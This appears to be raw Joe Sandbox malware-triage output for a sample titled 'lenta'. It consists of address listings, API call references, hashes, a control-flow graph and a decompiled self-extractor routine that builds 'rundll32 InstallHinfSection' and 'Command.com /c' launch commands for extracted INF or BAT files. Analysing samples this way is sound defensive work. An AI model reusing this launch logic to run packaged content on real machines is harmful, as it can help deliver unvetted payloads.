                                                                        0x00f33c39
                                                                        0x00f33c40
                                                                        0x00f33d13
                                                                        0x00f33d15
                                                                        0x00f33d21
                                                                        0x00f33d26
                                                                        0x00000000
                                                                        0x00f33c4f
                                                                        0x00f33c56
                                                                        0x00f33c60
                                                                        0x00f33c65
                                                                        0x00f33c77
                                                                        0x00f33c78
                                                                        0x00f33c7c
                                                                        0x00f33c7e
                                                                        0x00f33c82
                                                                        0x00f33c82
                                                                        0x00000000
                                                                        0x00f33c7c
                                                                        0x00f33c67
                                                                        0x00f33c69
                                                                        0x00f33c6d
                                                                        0x00000000
                                                                        0x00f33c58
                                                                        0x00f33c58
                                                                        0x00f33c6e
                                                                        0x00f33c6e
                                                                        0x00f33c87
                                                                        0x00f33c89
                                                                        0x00f33d4d
                                                                        0x00f33d4f
                                                                        0x00f33d50
                                                                        0x00f33d52
                                                                        0x00f33d9e
                                                                        0x00f33da8
                                                                        0x00f33daf
                                                                        0x00f33db4
                                                                        0x00f33db6
                                                                        0x00f33f4d
                                                                        0x00f33f4d
                                                                        0x00f33f4f
                                                                        0x00f33f56
                                                                        0x00f33f57
                                                                        0x00f33f58
                                                                        0x00f33f63
                                                                        0x00f33f63
                                                                        0x00f33dbc
                                                                        0x00f33dc0
                                                                        0x00f33dc2
                                                                        0x00f33de6
                                                                        0x00f33de6
                                                                        0x00f33de8
                                                                        0x00f33f0b
                                                                        0x00f33f0b
                                                                        0x00f33f0f
                                                                        0x00f33f13
                                                                        0x00f33f15
                                                                        0x00f33f1a
                                                                        0x00f33f1c
                                                                        0x00f33f46
                                                                        0x00f33f47
                                                                        0x00000000
                                                                        0x00f33f47
                                                                        0x00f33f1e
                                                                        0x00f33f1f
                                                                        0x00f33f25
                                                                        0x00f33f26
                                                                        0x00f33f2a
                                                                        0x00f33f2d
                                                                        0x00f33fd9
                                                                        0x00f33fd9
                                                                        0x00f33fda
                                                                        0x00f33fda
                                                                        0x00f33fe1
                                                                        0x00f33fe3
                                                                        0x00f33fe3
                                                                        0x00f33fe8
                                                                        0x00000000
                                                                        0x00f33fe8
                                                                        0x00f33f33
                                                                        0x00f33f37
                                                                        0x00000000
                                                                        0x00f33f37
                                                                        0x00f33dee
                                                                        0x00f33dee
                                                                        0x00f33df5
                                                                        0x00f33fad
                                                                        0x00f33fb9
                                                                        0x00f33fc2
                                                                        0x00f33fc8
                                                                        0x00000000
                                                                        0x00f33fc8
                                                                        0x00f33dfb
                                                                        0x00f33dfd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33e03
                                                                        0x00f33e0a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33e15
                                                                        0x00f33e17
                                                                        0x00f33e19
                                                                        0x00f33f94
                                                                        0x00f33fa4
                                                                        0x00f33f7c
                                                                        0x00f33f80
                                                                        0x00f33f8b
                                                                        0x00000000
                                                                        0x00f33f8b
                                                                        0x00f33e2c
                                                                        0x00f33e30
                                                                        0x00f33e34
                                                                        0x00f33e36
                                                                        0x00f33f69
                                                                        0x00f33f6e
                                                                        0x00f33f70
                                                                        0x00f33f76
                                                                        0x00000000
                                                                        0x00f33f76
                                                                        0x00f33e3c
                                                                        0x00f33e43
                                                                        0x00f33e47
                                                                        0x00f33e52
                                                                        0x00f33e56
                                                                        0x00f33e5c
                                                                        0x00f33e61
                                                                        0x00f33e68
                                                                        0x00f33e70
                                                                        0x00f33e74
                                                                        0x00f33e7c
                                                                        0x00f33e80
                                                                        0x00f33e82
                                                                        0x00f33e82
                                                                        0x00f33e87
                                                                        0x00f33e87
                                                                        0x00f33e8b
                                                                        0x00f33e91
                                                                        0x00f33e94
                                                                        0x00f33e96
                                                                        0x00f33e96
                                                                        0x00f33e9b
                                                                        0x00f33e9b
                                                                        0x00f33e9f
                                                                        0x00f33ea2
                                                                        0x00f33ea4
                                                                        0x00f33ea4
                                                                        0x00f33ea9
                                                                        0x00f33ea9
                                                                        0x00f33ead
                                                                        0x00f33eb3
                                                                        0x00f33eb6
                                                                        0x00f33eb8
                                                                        0x00f33eb8
                                                                        0x00f33ebd
                                                                        0x00f33ebd
                                                                        0x00f33ec1
                                                                        0x00f33ec3
                                                                        0x00f33ec5
                                                                        0x00f33ec5
                                                                        0x00f33eca
                                                                        0x00f33eca
                                                                        0x00f33ece
                                                                        0x00f33ed5
                                                                        0x00f33ed9
                                                                        0x00f33ee0
                                                                        0x00f33ee6
                                                                        0x00f33eea
                                                                        0x00f33eec
                                                                        0x00f33eee
                                                                        0x00f33ef3
                                                                        0x00f33ef3
                                                                        0x00f33ef5
                                                                        0x00f33efa
                                                                        0x00f33efb
                                                                        0x00f33efd
                                                                        0x00f33f40
                                                                        0x00000000
                                                                        0x00f33eff
                                                                        0x00f33eff
                                                                        0x00f33f05
                                                                        0x00000000
                                                                        0x00f33f05
                                                                        0x00f33efd
                                                                        0x00f33dc7
                                                                        0x00f33dce
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33dd0
                                                                        0x00f33dd7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33dd9
                                                                        0x00f33ddb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33ddd
                                                                        0x00f33de1
                                                                        0x00000000
                                                                        0x00f33de1
                                                                        0x00f33d59
                                                                        0x00f33d65
                                                                        0x00f33d6a
                                                                        0x00f33d6c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33d6e
                                                                        0x00f33d75
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33d8f
                                                                        0x00f33d96
                                                                        0x00f33d98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33d98
                                                                        0x00f33c8f
                                                                        0x00f33c98
                                                                        0x00f33cf1
                                                                        0x00f33cf3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33cfe
                                                                        0x00f33d11
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33d11
                                                                        0x00f33c9c
                                                                        0x00f33ca5
                                                                        0x00f33ca7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33cad
                                                                        0x00f33cb2
                                                                        0x00f33cb7
                                                                        0x00f33cc5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33ce8
                                                                        0x00f33cec
                                                                        0x00f33ced
                                                                        0x00f33ced
                                                                        0x00000000
                                                                        0x00f33ce8
                                                                        0x00f33c9e
                                                                        0x00000000
                                                                        0x00f33c9e
                                                                        0x00f33c56
                                                                        0x00f33d35
                                                                        0x00f33d35
                                                                        0x00f33d3c
                                                                        0x00f33d48
                                                                        0x00000000
                                                                        0x00f33d48
                                                                        0x00f33c03
                                                                        0x00f33be2
                                                                        0x00f33be7
                                                                        0x00f33bee
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00F33C11
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00F33CDC
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00F38C42), ref: 00F33D8F
                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00F33E26
                                                                        • FreeLibrary.KERNEL32(00000000,?,00F38C42), ref: 00F33EFF
                                                                        • LocalFree.KERNEL32(?,?,?,?,00F38C42), ref: 00F33F1F
                                                                        • FreeLibrary.KERNEL32(00000000,?,00F38C42), ref: 00F33F40
                                                                        • LocalFree.KERNEL32(?,?,?,?,00F38C42), ref: 00F33F47
                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00F38C42), ref: 00F33F76
                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00F38C42), ref: 00F33F80
                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00F38C42), ref: 00F33FC2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                        • String ID: <None>$ADMQCMD$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                        • API String ID: 1032054927-1033524935
                                                                        • Opcode ID: 07127e23abc38d29e47377d1be1b481afdf47c495102e71f011d27b0ff362593
                                                                        • Instruction ID: 1e9235beddf59dc892ed890a0f012e44dc5f74d0aaa98c0d48332ce491eb1575
                                                                        • Opcode Fuzzy Hash: 07127e23abc38d29e47377d1be1b481afdf47c495102e71f011d27b0ff362593
                                                                        • Instruction Fuzzy Hash: 3AB122709083059BD724DF34CC45B6B76E5EB84770F00092DFA85D62A1EBB8CA45FB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 141 f31ae8-f31b2c call f31680 144 f31b3b-f31b40 141->144 145 f31b2e-f31b39 141->145 146 f31b46-f31b61 call f31a84 144->146 145->146 149 f31b63-f31b65 146->149 150 f31b9f-f31bc2 call f31781 call f3658a 146->150 152 f31b68-f31b6d 149->152 159 f31bc7-f31bd3 call f366c8 150->159 152->152 154 f31b6f-f31b74 152->154 154->150 155 f31b76-f31b7b 154->155 157 f31b83-f31b86 155->157 158 f31b7d-f31b81 155->158 157->150 161 f31b88-f31b8a 157->161 158->157 160 f31b8c-f31b9d call f31680 158->160 166 f31d73-f31d7f call f366c8 159->166 167 f31bd9-f31bf1 CompareStringA 159->167 160->159 161->150 161->160 174 f31d81-f31d99 CompareStringA 166->174 175 f31df8-f31e09 LocalAlloc 166->175 167->166 169 f31bf7-f31c07 GetFileAttributesA 167->169 170 f31d53-f31d5e 169->170 171 f31c0d-f31c15 169->171 176 f31d64-f31d6e call f344b9 170->176 171->170 173 f31c1b-f31c33 call f31a84 171->173 187 f31c50-f31c61 LocalAlloc 173->187 188 f31c35-f31c38 173->188 174->175 178 f31d9b-f31da2 174->178 179 f31dd4-f31ddf 175->179 180 f31e0b-f31e1b GetFileAttributesA 175->180 192 f31e94-f31ea4 call f36ce0 176->192 183 f31da5-f31daa 178->183 179->176 184 f31e67-f31e73 call f31680 180->184 185 f31e1d-f31e1f 180->185 183->183 189 f31dac-f31db4 183->189 198 f31e78-f31e84 call f32aac 184->198 185->184 191 f31e21-f31e3e call f31781 185->191 187->179 197 f31c67-f31c72 187->197 194 f31c40-f31c4b call f31a84 188->194 195 f31c3a 188->195 196 f31db7-f31dbc 189->196 191->198 207 f31e40-f31e43 191->207 194->187 195->194 196->196 202 f31dbe-f31dd2 LocalAlloc 196->202 203 f31c74 197->203 204 f31c79-f31cc0 GetPrivateProfileIntA GetPrivateProfileStringA 197->204 211 f31e89-f31e92 198->211 202->179 208 f31de1-f31df3 call f3171e 202->208 203->204 209 f31cc2-f31ccc 204->209 210 f31cf8-f31d07 204->210 207->198 212 f31e45-f31e65 call f316b3 * 2 207->212 208->211 216 f31cd3-f31cf3 call f31680 * 2 209->216 217 f31cce 209->217 213 f31d23 210->213 214 f31d09-f31d21 GetShortPathNameA 210->214 211->192 212->198 219 f31d28-f31d2b 213->219 214->219 216->211 217->216 224 f31d32-f31d4e call f3171e 219->224 225 f31d2d 219->225 224->211 225->224
                                                                        C-Code - Quality: 82%
                                                                        			E00F31AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v527;
                                                                        				char _v528;
                                                                        				char _v1552;
                                                                        				CHAR* _v1556;
                                                                        				int* _v1560;
                                                                        				CHAR** _v1564;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t48;
                                                                        				CHAR* _t53;
                                                                        				CHAR* _t54;
                                                                        				char* _t57;
                                                                        				char* _t58;
                                                                        				CHAR* _t60;
                                                                        				void* _t62;
                                                                        				signed char _t65;
                                                                        				intOrPtr _t76;
                                                                        				intOrPtr _t77;
                                                                        				unsigned int _t85;
                                                                        				CHAR* _t90;
                                                                        				CHAR* _t92;
                                                                        				char _t105;
                                                                        				char _t106;
                                                                        				CHAR** _t111;
                                                                        				CHAR* _t115;
                                                                        				intOrPtr* _t125;
                                                                        				void* _t126;
                                                                        				CHAR* _t132;
                                                                        				CHAR* _t135;
                                                                        				void* _t138;
                                                                        				void* _t139;
                                                                        				void* _t145;
                                                                        				intOrPtr* _t146;
                                                                        				char* _t148;
                                                                        				CHAR* _t151;
                                                                        				void* _t152;
                                                                        				CHAR* _t155;
                                                                        				CHAR* _t156;
                                                                        				void* _t157;
                                                                        				signed int _t158;
                                                                        
                                                                        				_t48 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t48 ^ _t158;
                                                                        				_t108 = __ecx;
                                                                        				_v1564 = _a4;
                                                                        				_v1560 = _a8;
                                                                        				E00F31680( &_v528, 0x104, __ecx);
                                                                        				if(_v528 != 0x22) {
                                                                        					_t135 = " ";
                                                                        					_t53 =  &_v528;
                                                                        				} else {
                                                                        					_t135 = "\"";
                                                                        					_t53 =  &_v527;
                                                                        				}
                                                                        				_t111 =  &_v1556;
                                                                        				_v1556 = _t53;
                                                                        				_t54 = E00F31A84(_t111, _t135);
                                                                        				_t156 = _v1556;
                                                                        				_t151 = _t54;
                                                                        				if(_t156 == 0) {
                                                                        					L12:
                                                                        					_push(_t111);
                                                                        					E00F31781( &_v268, 0x104, _t111, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        					E00F3658A( &_v268, 0x104, _t156);
                                                                        					goto L13;
                                                                        				} else {
                                                                        					_t132 = _t156;
                                                                        					_t148 =  &(_t132[1]);
                                                                        					do {
                                                                        						_t105 =  *_t132;
                                                                        						_t132 =  &(_t132[1]);
                                                                        					} while (_t105 != 0);
                                                                        					_t111 = _t132 - _t148;
                                                                        					if(_t111 < 3) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_t106 = _t156[1];
                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							goto L11;
                                                                        						}
                                                                        					} else {
                                                                        						L11:
                                                                        						E00F31680( &_v268, 0x104, _t156);
                                                                        						L13:
                                                                        						_t138 = 0x2e;
                                                                        						_t57 = E00F366C8(_t156, _t138);
                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                        							_t139 = 0x2e;
                                                                        							_t115 = _t156;
                                                                        							_t58 = E00F366C8(_t115, _t139);
                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                        								if(_t156 == 0) {
                                                                        									goto L43;
                                                                        								}
                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                        									E00F31680( &_v1552, 0x400, _t108);
                                                                        								} else {
                                                                        									_push(_t115);
                                                                        									_t108 = 0x400;
                                                                        									E00F31781( &_v1552, 0x400, _t115,  &_v268);
                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                        										E00F316B3( &_v1552, 0x400, " ");
                                                                        										E00F316B3( &_v1552, 0x400, _t151);
                                                                        									}
                                                                        								}
                                                                        								_t140 = _t156;
                                                                        								 *_t156 = 0;
                                                                        								E00F32AAC( &_v1552, _t156, _t156);
                                                                        								goto L53;
                                                                        							} else {
                                                                        								_t108 = "Command.com /c %s";
                                                                        								_t125 = "Command.com /c %s";
                                                                        								_t145 = _t125 + 1;
                                                                        								do {
                                                                        									_t76 =  *_t125;
                                                                        									_t125 = _t125 + 1;
                                                                        								} while (_t76 != 0);
                                                                        								_t126 = _t125 - _t145;
                                                                        								_t146 =  &_v268;
                                                                        								_t157 = _t146 + 1;
                                                                        								do {
                                                                        									_t77 =  *_t146;
                                                                        									_t146 = _t146 + 1;
                                                                        								} while (_t77 != 0);
                                                                        								_t140 = _t146 - _t157;
                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                        								if(_t156 != 0) {
                                                                        									E00F3171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                        									goto L53;
                                                                        								}
                                                                        								goto L43;
                                                                        							}
                                                                        						} else {
                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                        								_t140 = 0x525;
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_t60 =  &_v268;
                                                                        								goto L35;
                                                                        							} else {
                                                                        								_t140 = "[";
                                                                        								_v1556 = _t151;
                                                                        								_t90 = E00F31A84( &_v1556, "[");
                                                                        								if(_t90 != 0) {
                                                                        									if( *_t90 != 0) {
                                                                        										_v1556 = _t90;
                                                                        									}
                                                                        									_t140 = "]";
                                                                        									E00F31A84( &_v1556, "]");
                                                                        								}
                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                        								if(_t156 == 0) {
                                                                        									L43:
                                                                        									_t60 = 0;
                                                                        									_t140 = 0x4b5;
                                                                        									_push(0);
                                                                        									_push(0x10);
                                                                        									_push(0);
                                                                        									L35:
                                                                        									_push(_t60);
                                                                        									E00F344B9(0, _t140);
                                                                        									_t62 = 0;
                                                                        									goto L54;
                                                                        								} else {
                                                                        									_t155 = _v1556;
                                                                        									_t92 = _t155;
                                                                        									if( *_t155 == 0) {
                                                                        										_t92 = "DefaultInstall";
                                                                        									}
                                                                        									 *0xf39120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                        									 *_v1560 = 1;
                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xf31140, _t156, 8,  &_v268) == 0) {
                                                                        										 *0xf39a34 =  *0xf39a34 & 0xfffffffb;
                                                                        										if( *0xf39a40 != 0) {
                                                                        											_t108 = "setupapi.dll";
                                                                        										} else {
                                                                        											_t108 = "setupx.dll";
                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                        										}
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										_push( &_v268);
                                                                        										_push(_t155);
                                                                        										E00F3171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                        									} else {
                                                                        										 *0xf39a34 =  *0xf39a34 | 0x00000004;
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										E00F31680(_t108, 0x104, _t155);
                                                                        										_t140 = 0x200;
                                                                        										E00F31680(_t156, 0x200,  &_v268);
                                                                        									}
                                                                        									L53:
                                                                        									_t62 = 1;
                                                                        									 *_v1564 = _t156;
                                                                        									L54:
                                                                        									_pop(_t152);
                                                                        									return E00F36CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}














































                                                                        0x00f31af3
                                                                        0x00f31afa
                                                                        0x00f31b07
                                                                        0x00f31b09
                                                                        0x00f31b1a
                                                                        0x00f31b20
                                                                        0x00f31b2c
                                                                        0x00f31b3b
                                                                        0x00f31b40
                                                                        0x00f31b2e
                                                                        0x00f31b2e
                                                                        0x00f31b33
                                                                        0x00f31b33
                                                                        0x00f31b46
                                                                        0x00f31b4c
                                                                        0x00f31b52
                                                                        0x00f31b57
                                                                        0x00f31b5d
                                                                        0x00f31b61
                                                                        0x00f31b9f
                                                                        0x00f31b9f
                                                                        0x00f31bb1
                                                                        0x00f31bc2
                                                                        0x00000000
                                                                        0x00f31b63
                                                                        0x00f31b63
                                                                        0x00f31b65
                                                                        0x00f31b68
                                                                        0x00f31b68
                                                                        0x00f31b6a
                                                                        0x00f31b6b
                                                                        0x00f31b6f
                                                                        0x00f31b74
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f31b76
                                                                        0x00f31b7b
                                                                        0x00f31b86
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f31b8c
                                                                        0x00f31b8c
                                                                        0x00f31b98
                                                                        0x00f31bc7
                                                                        0x00f31bc9
                                                                        0x00f31bcc
                                                                        0x00f31bd3
                                                                        0x00f31d75
                                                                        0x00f31d76
                                                                        0x00f31d78
                                                                        0x00f31d7f
                                                                        0x00f31e05
                                                                        0x00f31e09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f31e12
                                                                        0x00f31e1b
                                                                        0x00f31e73
                                                                        0x00f31e21
                                                                        0x00f31e21
                                                                        0x00f31e28
                                                                        0x00f31e37
                                                                        0x00f31e3e
                                                                        0x00f31e52
                                                                        0x00f31e60
                                                                        0x00f31e60
                                                                        0x00f31e3e
                                                                        0x00f31e79
                                                                        0x00f31e7b
                                                                        0x00f31e84
                                                                        0x00000000
                                                                        0x00f31d9b
                                                                        0x00f31d9b
                                                                        0x00f31da0
                                                                        0x00f31da2
                                                                        0x00f31da5
                                                                        0x00f31da5
                                                                        0x00f31da7
                                                                        0x00f31da8
                                                                        0x00f31dac
                                                                        0x00f31dae
                                                                        0x00f31db4
                                                                        0x00f31db7
                                                                        0x00f31db7
                                                                        0x00f31db9
                                                                        0x00f31dba
                                                                        0x00f31dbe
                                                                        0x00f31dc3
                                                                        0x00f31dce
                                                                        0x00f31dd2
                                                                        0x00f31deb
                                                                        0x00000000
                                                                        0x00f31df0
                                                                        0x00000000
                                                                        0x00f31dd2
                                                                        0x00f31bf7
                                                                        0x00f31bfe
                                                                        0x00f31c07
                                                                        0x00f31d55
                                                                        0x00f31d5a
                                                                        0x00f31d5b
                                                                        0x00f31d5d
                                                                        0x00f31d5e
                                                                        0x00000000
                                                                        0x00f31c1b
                                                                        0x00f31c1b
                                                                        0x00f31c20
                                                                        0x00f31c2c
                                                                        0x00f31c33
                                                                        0x00f31c38
                                                                        0x00f31c3a
                                                                        0x00f31c3a
                                                                        0x00f31c40
                                                                        0x00f31c4b
                                                                        0x00f31c4b
                                                                        0x00f31c5d
                                                                        0x00f31c61
                                                                        0x00f31dd4
                                                                        0x00f31dd4
                                                                        0x00f31dd6
                                                                        0x00f31ddb
                                                                        0x00f31ddc
                                                                        0x00f31dde
                                                                        0x00f31d64
                                                                        0x00f31d64
                                                                        0x00f31d67
                                                                        0x00f31d6c
                                                                        0x00000000
                                                                        0x00f31c67
                                                                        0x00f31c67
                                                                        0x00f31c6d
                                                                        0x00f31c72
                                                                        0x00f31c74
                                                                        0x00f31c74
                                                                        0x00f31c8e
                                                                        0x00f31c99
                                                                        0x00f31cc0
                                                                        0x00f31cf8
                                                                        0x00f31d07
                                                                        0x00f31d23
                                                                        0x00f31d09
                                                                        0x00f31d14
                                                                        0x00f31d1b
                                                                        0x00f31d1b
                                                                        0x00f31d2b
                                                                        0x00f31d2d
                                                                        0x00f31d2d
                                                                        0x00f31d38
                                                                        0x00f31d39
                                                                        0x00f31d46
                                                                        0x00f31cc2
                                                                        0x00f31cc2
                                                                        0x00f31ccc
                                                                        0x00f31cce
                                                                        0x00f31cce
                                                                        0x00f31cdb
                                                                        0x00f31ce6
                                                                        0x00f31cee
                                                                        0x00f31cee
                                                                        0x00f31e89
                                                                        0x00f31e91
                                                                        0x00f31e92
                                                                        0x00f31e94
                                                                        0x00f31e97
                                                                        0x00f31ea4
                                                                        0x00f31ea4
                                                                        0x00f31c61
                                                                        0x00f31c07
                                                                        0x00f31bd3
                                                                        0x00f31b7b

                                                                        APIs
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F31BE7
                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F31BFE
                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F31C57
                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00F31C88
                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00F31140,00000000,00000008,?), ref: 00F31CB8
                                                                        • GetShortPathNameA.KERNEL32 ref: 00F31D1B
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                        • API String ID: 383838535-3964152161
                                                                        • Opcode ID: 4f61784907ab5529a9bbe6f5a6cf286b52259734eb9d40cc78723bcebf600c1a
                                                                        • Instruction ID: 0e3030ff74f57f71bb16d0ff7dac3a0ec21a733492491797522e187f12132c8b
                                                                        • Opcode Fuzzy Hash: 4f61784907ab5529a9bbe6f5a6cf286b52259734eb9d40cc78723bcebf600c1a
                                                                        • Instruction Fuzzy Hash: C2A14BB1E002186BEF20AB24CC45FEA7769FB91330F144295F595A32D1DBB49EC6EB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
